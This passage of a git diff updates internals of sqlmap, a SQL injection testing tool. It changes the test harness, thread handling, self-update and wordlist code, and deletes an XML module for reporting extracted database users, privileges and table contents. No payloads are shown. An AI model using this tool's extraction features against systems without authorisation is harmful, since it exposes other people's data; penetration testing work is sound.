" % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warn(warnMsg) - paths.SQLMAP_OUTPUT_PATH = tempDir + paths.SQLMAP_OUTPUT_PATH = tempDir conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) @@ -635,6 +671,7 @@ def _createTargetDirs(): with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) + f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) if conf.data: f.write("\n\n%s" % getUnicode(conf.data)) except IOError, ex: @@ -642,7 +679,7 @@ def _createTargetDirs(): errMsg = "you don't have enough permissions " else: errMsg = "something went wrong while trying " - errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, ex) + errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex)) raise SqlmapMissingPrivileges(errMsg) @@ -683,10 +720,13 @@ def initTargetEnv(): class _(unicode): pass + kb.postUrlEncode = True + for key, value in conf.httpHeaders: if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper(): kb.postUrlEncode = "urlencoded" in value break + if kb.postUrlEncode: original = conf.data conf.data = _(urldecode(conf.data)) diff --git a/lib/core/testing.py b/lib/core/testing.py index 8339cbc32..23dd751ac 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -25,6 +25,7 @@ from lib.core.common import readXmlFile from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapNotVulnerableException from lib.core.log import LOGGER_HANDLER @@ -40,6 +41,8 @@ class Failures(object): failedParseOn = None failedTraceBack = None +_failures = Failures() + def smokeTest(): """ Runs the basic smoke testing of a program @@ -52,16 +55,17 @@ def smokeTest(): if any(_ in root for _ in ("thirdparty", "extra")): continue - for ifile in files: - length += 1 + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue - for ifile in files: - if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": - path = os.path.join(root, os.path.splitext(ifile)[0]) + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: @@ -70,7 +74,7 @@ def smokeTest(): except Exception, msg: retVal = False dataToStdout("\r") - errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg) + errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg) logger.error(errMsg) else: # Run doc tests @@ -79,9 +83,9 @@ def smokeTest(): if failure_count > 
0: retVal = False - count += 1 - status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) - dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + count += 1 + status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) + dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: @@ -191,11 +195,11 @@ def liveTest(): else: errMsg = "test failed" - if Failures.failedItems: - errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems) + if _failures.failedItems: + errMsg += " at parsing items: %s" % ", ".join(i for i in _failures.failedItems) errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH - errMsg += " - traceback: %s" % bool(Failures.failedTraceBack) + errMsg += " - traceback: %s" % bool(_failures.failedTraceBack) if not vulnerable: errMsg += " - SQL injection not detected" @@ -203,14 +207,14 @@ def liveTest(): logger.error(errMsg) test_case_fd.write("%s\n" % errMsg) - if Failures.failedParseOn: + if _failures.failedParseOn: console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING) - console_output_fd.write(Failures.failedParseOn) + console_output_fd.write(_failures.failedParseOn) console_output_fd.close() - if Failures.failedTraceBack: + if _failures.failedTraceBack: traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING) - traceback_fd.write(Failures.failedTraceBack) + traceback_fd.write(_failures.failedTraceBack) traceback_fd.close() beep() @@ -231,11 +235,11 @@ def liveTest(): return retVal def initCase(switches, count): - Failures.failedItems = [] - Failures.failedParseOn = None - Failures.failedTraceBack = None + _failures.failedItems = [] + _failures.failedParseOn = None + _failures.failedTraceBack = None - paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count) + paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count)) paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") @@ -277,10 +281,10 @@ def runCase(parse): LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__ if unhandled_exception: - Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) + _failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) retVal = None elif handled_exception: - Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) + _failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) retVal = None elif result is False: # this means no SQL injection has been detected - if None, ignore retVal = False @@ -297,17 +301,17 @@ def runCase(parse): if item.startswith("r'") and item.endswith("'"): if not re.search(item[2:-1], parse_on, re.DOTALL): retVal = None - Failures.failedItems.append(item) + _failures.failedItems.append(item) elif item not in parse_on: retVal = None - Failures.failedItems.append(item) + _failures.failedItems.append(item) - if Failures.failedItems: - Failures.failedParseOn = console + if _failures.failedItems: + _failures.failedParseOn = console elif retVal is False: - Failures.failedParseOn = console + _failures.failedParseOn = console return retVal diff --git a/lib/core/threads.py b/lib/core/threads.py index 8647ecfd0..b3566b955 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -1,17 +1,16 @@ 
#!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import difflib +import random import threading import time import traceback -from thread import error as threadError - from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -19,6 +18,7 @@ from lib.core.datatype import AttribDict from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapThreadException +from lib.core.exception import SqlmapUserQuitException from lib.core.exception import SqlmapValueException from lib.core.settings import MAX_NUMBER_OF_THREADS from lib.core.settings import PYVERSION @@ -38,22 +38,30 @@ class _ThreadData(threading.local): Resets thread data model """ + self.requestCollector = None + self.disableStdOut = False self.hashDBCursor = None self.inTransaction = False + self.lastCode = None self.lastComparisonPage = None self.lastComparisonHeaders = None + self.lastComparisonCode = None + self.lastComparisonRatio = None self.lastErrorPage = None self.lastHTTPError = None self.lastRedirectMsg = None self.lastQueryDuration = 0 + self.lastPage = None self.lastRequestMsg = None self.lastRequestUID = 0 self.lastRedirectURL = None + self.random = random.WichmannHill() self.resumed = False self.retriesCount = 0 self.seqMatcher = difflib.SequenceMatcher(None) self.shared = shared + self.validationRun = 0 self.valueStack = [] ThreadData = _ThreadData() @@ -61,7 +69,7 @@ ThreadData = _ThreadData() def getCurrentThreadUID(): return hash(threading.currentThread()) -def readInput(message, default=None): +def readInput(message, default=None, checkBatch=True, boolean=False): # It will be overwritten by original from lib.core.common pass @@ -81,16 +89,16 @@ def getCurrentThreadName(): return threading.current_thread().getName() -def exceptionHandledFunction(threadFunction): +def exceptionHandledFunction(threadFunction, silent=False): try: threadFunction() except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True raise - except Exception, errMsg: - # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + except Exception, ex: + if not silent: + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) def setDaemon(thread): # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation @@ -144,8 +152,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio try: thread.start() - except threadError, errMsg: - errMsg = "error occurred while starting new thread ('%s')" % errMsg + except Exception, ex: + errMsg = "error occurred while starting new thread ('%s')" % ex.message logger.critical(errMsg) break @@ -160,13 +168,13 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio alive = True time.sleep(0.1) - except KeyboardInterrupt: + except (KeyboardInterrupt, SqlmapUserQuitException), ex: print kb.threadContinue = False kb.threadException = True if numThreads > 1: - logger.info("waiting for threads to finish (Ctrl+C was pressed)") + logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) try: while (threading.activeCount() > 1): pass @@ -177,10 +185,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, 
forwardExceptio if forwardException: raise - except (SqlmapConnectionException, SqlmapValueException), errMsg: + except (SqlmapConnectionException, SqlmapValueException), ex: print kb.threadException = True - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) except: from lib.core.common import unhandledExceptionMessage @@ -198,8 +206,11 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio kb.threadException = False for lock in kb.locks.values(): - if lock.locked_lock(): - lock.release() + if lock.locked(): + try: + lock.release() + except: + pass if conf.get("hashDB"): conf.hashDB.flush(True) diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py index 205b77a94..f83ee895c 100644 --- a/lib/core/unescaper.py +++ b/lib/core/unescaper.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/update.py b/lib/core/update.py index f2a8de322..279467687 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -1,18 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import locale import os import re +import subprocess import time -from subprocess import PIPE -from subprocess import Popen as execute - from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import pollProcess from lib.core.data import conf from lib.core.data import logger @@ -26,11 +26,10 @@ def update(): return success = False - rootDir = paths.SQLMAP_ROOT_PATH - if not os.path.exists(os.path.join(rootDir, ".git")): + if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)" + errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" logger.error(errMsg) else: infoMsg = "updating sqlmap to the latest development version from the " @@ -41,17 +40,25 @@ def update(): logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) - process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE) - pollProcess(process, True) - stdout, stderr = process.communicate() - success = not process.returncode + + try: + process = subprocess.Popen("git checkout . 
&& git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/ + pollProcess(process, True) + stdout, stderr = process.communicate() + success = not process.returncode + except (IOError, OSError), ex: + success = False + stderr = getSafeExString(ex) if success: - import lib.core.settings - _ = lib.core.settings.REVISION = getRevisionNumber() - logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) + logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", getRevisionNumber())) else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) + if "Not a git repository" in stderr: + errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " + errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" + logger.error(errMsg) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) if not success: if IS_WIN: diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index bc4e486a1..508091e08 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py @@ -1,16 +1,16 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import zipfile +from lib.core.common import getSafeExString from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapInstallationException -from lib.core.settings import UNICODE_ENCODING class Wordlist(object): """ @@ -41,7 +41,13 @@ class Wordlist(object): else: self.current = self.filenames[self.index] if os.path.splitext(self.current)[1].lower() == ".zip": - _ = zipfile.ZipFile(self.current, 'r') + try: + _ = zipfile.ZipFile(self.current, 'r') + except zipfile.error, ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException, errMsg if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % self.current raise SqlmapDataException(errMsg) @@ -64,17 +70,13 @@ class Wordlist(object): try: retVal = self.iter.next().rstrip() except zipfile.error, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). 
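The reworked update() above runs git from the installation directory (cwd=..., encoded with the preferred locale to avoid UnicodeEncodeError on non-ASCII paths) rather than from whatever directory sqlmap happened to be launched in, and treats IOError/OSError as an ordinary failure. Reduced to a standalone helper (path handling simplified; the repository URL is shown for illustration):

    import locale
    import subprocess

    def pull_latest(root_dir, repository="https://github.com/sqlmapproject/sqlmap.git"):
        """Update a git checkout in-place; return (success, stdout, stderr)."""
        try:
            process = subprocess.Popen("git checkout . && git pull %s HEAD" % repository,
                                       shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                       cwd=root_dir.encode(locale.getpreferredencoding()))
            stdout, stderr = process.communicate()
            return process.returncode == 0, stdout, stderr
        except (IOError, OSError) as ex:
            return False, "", str(ex)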
Please make " % (self.current, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg except StopIteration: self.adjust() retVal = self.iter.next().rstrip() - try: - retVal = retVal.decode(UNICODE_ENCODING) - except UnicodeDecodeError: - continue if not self.proc_count or self.counter % self.proc_count == self.proc_id: break return retVal diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py deleted file mode 100644 index e0c377962..000000000 --- a/lib/core/xmldump.py +++ /dev/null @@ -1,536 +0,0 @@ -#!/usr/bin/env python - -import codecs -import os -import re -import xml - -import xml.sax.saxutils as saxutils - -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.settings import UNICODE_ENCODING -from thirdparty.prettyprint import prettyprint -from xml.dom.minidom import Document -from xml.parsers.expat import ExpatError - -TECHNIC_ELEM_NAME = "Technic" -TECHNICS_ELEM_NAME = "Technics" -BANNER_ELEM_NAME = "Banner" -COLUMNS_ELEM_NAME = "DatabaseColumns" -COLUMN_ELEM_NAME = "Column" -CELL_ELEM_NAME = "Cell" -COLUMN_ATTR = "column" -ROW_ELEM_NAME = "Row" -TABLES_ELEM_NAME = "tables" -DATABASE_COLUMNS_ELEM = "DB" -DB_TABLES_ELEM_NAME = "DBTables" -DB_TABLE_ELEM_NAME = "DBTable" -IS_DBA_ELEM_NAME = "isDBA" -FILE_CONTENT_ELEM_NAME = "FileContent" -DB_ATTR = "db" -UNKNOWN_COLUMN_TYPE = "unknown" -USER_SETTINGS_ELEM_NAME = "UserSettings" -USER_SETTING_ELEM_NAME = "UserSetting" -USERS_ELEM_NAME = "Users" -USER_ELEM_NAME = "User" -DB_USER_ELEM_NAME = "DBUser" -SETTINGS_ELEM_NAME = "Settings" -DBS_ELEM_NAME = "DBs" -DB_NAME_ELEM_NAME = "DBName" -DATABASE_ELEM_NAME = "Database" -TABLE_ELEM_NAME = "Table" -DB_TABLE_VALUES_ELEM_NAME = "DBTableValues" -DB_VALUES_ELEM = "DBValues" -QUERIES_ELEM_NAME = "Queries" -QUERY_ELEM_NAME = "Query" -REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries" -REGISTER_DATA_ELEM_NAME = "RegisterData" -DEFAULT_DB = "All" -MESSAGE_ELEM = "Message" -MESSAGES_ELEM_NAME = "Messages" -ERROR_ELEM_NAME = "Error" -LST_ELEM_NAME = "List" -LSTS_ELEM_NAME = "Lists" -CURRENT_USER_ELEM_NAME = "CurrentUser" -CURRENT_DB_ELEM_NAME = "CurrentDB" -MEMBER_ELEM = "Member" -ADMIN_USER = "Admin" -REGULAR_USER = "User" -STATUS_ELEM_NAME = "Status" -RESULTS_ELEM_NAME = "Results" -UNHANDLED_PROBLEM_TYPE = "Unhandled" -NAME_ATTR = "name" -TYPE_ATTR = "type" -VALUE_ATTR = "value" -SUCESS_ATTR = "success" -NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance' -XMLNS_ATTR = "xmlns:xsi" -SCHEME_NAME = "sqlmap.xsd" -SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation" -CHARACTERS_TO_ENCODE = range(32) + range(127, 256) -ENTITIES = {'"': '"', "'": "'"} - -class XMLDump(object): - ''' - This class purpose is to dump the data into an xml Format. 
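Both Wordlist hunks just above funnel zip trouble into the same installation-error message instead of letting a raw zipfile.error escape to the user. The open-and-validate step, pulled out into a sketch (the plain Exception raised here stands in for SqlmapInstallationException):

    import zipfile

    def open_wordlist(path):
        """Open a zipped wordlist and fail early with a readable message."""
        try:
            archive = zipfile.ZipFile(path, 'r')
        except zipfile.error as ex:
            raise Exception("something appears to be wrong with the file '%s' ('%s'). "
                            "Please make sure that you haven't made any changes to it" % (path, ex))
        if not archive.namelist():
            raise Exception("no file(s) inside '%s'" % path)
        return archive.open(archive.namelist()[0])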
- The format of the xml file is described in the scheme file xml/sqlmap.xsd - ''' - - def __init__(self): - self._outputFile = None - self._outputFP = None - self.__root = None - self.__doc = Document() - - def _addToRoot(self, element): - ''' - Adds element to the root element - ''' - self.__root.appendChild(element) - - def __write(self, data, n=True): - ''' - Writes the data into the file - ''' - if n: - self._outputFP.write("%s\n" % data) - else: - self._outputFP.write("%s " % data) - - self._outputFP.flush() - - kb.dataOutputFlag = True - - def _getRootChild(self, elemName): - ''' - Returns the child of the root with the described name - ''' - elements = self.__root.getElementsByTagName(elemName) - if elements: - return elements[0] - - return elements - - def _createTextNode(self, data): - ''' - Creates a text node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - if data is None: - return self.__doc.createTextNode(u'') - else: - escaped_data = saxutils.escape(data, ENTITIES) - return self.__doc.createTextNode(escaped_data) - - def _createAttribute(self, attrName, attrValue): - ''' - Creates an attribute node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - attr = self.__doc.createAttribute(attrName) - if attrValue is None: - attr.nodeValue = u'' - else: - attr.nodeValue = getUnicode(attrValue) - return attr - - def string(self, header, data, sort=True): - ''' - Adds string element to the xml. - ''' - if isinstance(data, (list, tuple, set)): - self.lister(header, data, sort) - return - - messagesElem = self._getRootChild(MESSAGES_ELEM_NAME) - if (not(messagesElem)): - messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME) - self._addToRoot(messagesElem) - - if data: - data = self._formatString(data) - else: - data = "" - - elem = self.__doc.createElement(MESSAGE_ELEM) - elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - elem.appendChild(self._createTextNode(data)) - messagesElem.appendChild(elem) - - def lister(self, header, elements, sort=True): - ''' - Adds information formatted as list element - ''' - lstElem = self.__doc.createElement(LST_ELEM_NAME) - lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - if elements: - if sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower()) - except: - pass - - for element in elements: - memberElem = self.__doc.createElement(MEMBER_ELEM) - lstElem.appendChild(memberElem) - if isinstance(element, basestring): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElem.appendChild(self._createTextNode(element)) - elif isinstance(element, (list, tuple, set)): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list")) - for e in element: - memberElemStr = self.__doc.createElement(MEMBER_ELEM) - memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElemStr.appendChild(self._createTextNode(getUnicode(e))) - memberElem.appendChild(memberElemStr) - listsElem = self._getRootChild(LSTS_ELEM_NAME) - if not(listsElem): - listsElem = self.__doc.createElement(LSTS_ELEM_NAME) - self._addToRoot(listsElem) - listsElem.appendChild(lstElem) - - def technic(self, technicType, data): - ''' - Adds information about the technic used to extract data from the db - ''' - technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME) - technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType)) - textNode = self._createTextNode(data) - 
technicElem.appendChild(textNode) - technicsElem = self._getRootChild(TECHNICS_ELEM_NAME) - if not(technicsElem): - technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME) - self._addToRoot(technicsElem) - technicsElem.appendChild(technicElem) - - def banner(self, data): - ''' - Adds information about the database banner to the xml. - The banner contains information about the type and the version of the database. - ''' - bannerElem = self.__doc.createElement(BANNER_ELEM_NAME) - bannerElem.appendChild(self._createTextNode(data)) - self._addToRoot(bannerElem) - - def currentUser(self, data): - ''' - Adds information about the current database user to the xml - ''' - currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME) - textNode = self._createTextNode(data) - currentUserElem.appendChild(textNode) - self._addToRoot(currentUserElem) - - def currentDb(self, data): - ''' - Adds information about the current database is use to the xml - ''' - currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME) - textNode = self._createTextNode(data) - currentDBElem.appendChild(textNode) - self._addToRoot(currentDBElem) - - def dba(self, isDBA): - ''' - Adds information to the xml that indicates whether the user has DBA privileges - ''' - isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME) - isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA))) - self._addToRoot(isDBAElem) - - def users(self, users): - ''' - Adds a list of the existing users to the xml - ''' - usersElem = self.__doc.createElement(USERS_ELEM_NAME) - if isinstance(users, basestring): - users = [users] - if users: - for user in users: - userElem = self.__doc.createElement(DB_USER_ELEM_NAME) - usersElem.appendChild(userElem) - userElem.appendChild(self._createTextNode(user)) - self._addToRoot(usersElem) - - def dbs(self, dbs): - ''' - Adds a list of the existing databases to the xml - ''' - dbsElem = self.__doc.createElement(DBS_ELEM_NAME) - if dbs: - for db in dbs: - dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME) - dbsElem.appendChild(dbElem) - dbElem.appendChild(self._createTextNode(db)) - self._addToRoot(dbsElem) - - def userSettings(self, header, userSettings, subHeader): - ''' - Adds information about the user's settings to the xml. - The information can be user's passwords, privileges and etc.. 
- ''' - self._areAdmins = set() - userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME) - if (not(userSettingsElem)): - userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME) - self._addToRoot(userSettingsElem) - - userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME) - userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower()) - - for user in users: - userElem = self.__doc.createElement(USER_ELEM_NAME) - userSettingElem.appendChild(userElem) - if user in self._areAdmins: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER)) - else: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER)) - - settings = userSettings[user] - - settings.sort() - - for setting in settings: - settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME) - settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader)) - settingTextNode = self._createTextNode(setting) - settingsElem.appendChild(settingTextNode) - userElem.appendChild(settingsElem) - userSettingsElem.appendChild(userSettingElem) - - def dbTables(self, dbTables): - ''' - Adds information of the existing db tables to the xml - ''' - if not isinstance(dbTables, dict): - self.string(TABLES_ELEM_NAME, dbTables) - return - - dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME) - - for db, tables in dbTables.items(): - tables.sort(key=lambda x: x.lower()) - dbElem = self.__doc.createElement(DATABASE_ELEM_NAME) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - dbTablesElem.appendChild(dbElem) - for table in tables: - tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME) - tableElem.appendChild(self._createTextNode(table)) - dbElem.appendChild(tableElem) - self._addToRoot(dbTablesElem) - - def dbTableColumns(self, tableColumns): - ''' - Adds information about the columns of the existing tables to the xml - ''' - - columnsElem = self._getRootChild(COLUMNS_ELEM_NAME) - if not(columnsElem): - columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME) - - for db, tables in tableColumns.items(): - if not db: - db = DEFAULT_DB - dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - columnsElem.appendChild(dbElem) - - for table, columns in tables.items(): - tableElem = self.__doc.createElement(TABLE_ELEM_NAME) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - colList = columns.keys() - colList.sort(key=lambda x: x.lower()) - - for column in colList: - colType = columns[column] - colElem = self.__doc.createElement(COLUMN_ELEM_NAME) - if colType is not None: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType)) - else: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE)) - colElem.appendChild(self._createTextNode(column)) - tableElem.appendChild(colElem) - - self._addToRoot(columnsElem) - - def dbTableValues(self, tableValues): - ''' - Adds the values of specific table to the xml. - The values are organized according to the relevant row and column. 
- ''' - tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME) - if (tableValues is not None): - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - count = int(tableValues["__infos__"]["count"]) - columns = tableValues.keys() - columns.sort(key=lambda x: x.lower()) - - tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db)) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - for i in range(count): - rowElem = self.__doc.createElement(ROW_ELEM_NAME) - tableElem.appendChild(rowElem) - for column in columns: - if column != "__infos__": - info = tableValues[column] - value = info["values"][i] - - if re.search("^[\ *]*$", value): - value = "NULL" - - cellElem = self.__doc.createElement(CELL_ELEM_NAME) - cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column)) - cellElem.appendChild(self._createTextNode(value)) - rowElem.appendChild(cellElem) - - dbValuesElem = self._getRootChild(DB_VALUES_ELEM) - if (not(dbValuesElem)): - dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM) - self._addToRoot(dbValuesElem) - - dbValuesElem.appendChild(tableElem) - - logger.info("Table '%s.%s' dumped to XML file" % (db, table)) - - def dbColumns(self, dbColumns, colConsider, dbs): - ''' - Adds information about the columns - ''' - for column in dbColumns.keys(): - printDbs = {} - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column in col: - if db in printDbs: - if tbl in printDbs[db]: - printDbs[db][tbl][col] = dataType - else: - printDbs[db][tbl] = {col: dataType} - else: - printDbs[db] = {} - printDbs[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(printDbs) - - def query(self, query, queryRes): - ''' - Adds details of an executed query to the xml. - The query details are the query itself and its results. - ''' - queryElem = self.__doc.createElement(QUERY_ELEM_NAME) - queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query)) - queryElem.appendChild(self._createTextNode(queryRes)) - queriesElem = self._getRootChild(QUERIES_ELEM_NAME) - if (not(queriesElem)): - queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME) - self._addToRoot(queriesElem) - queriesElem.appendChild(queryElem) - - def registerValue(self, registerData): - ''' - Adds information about an extracted registry key to the xml - ''' - registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME) - registerElem.appendChild(self._createTextNode(registerData)) - registriesElem = 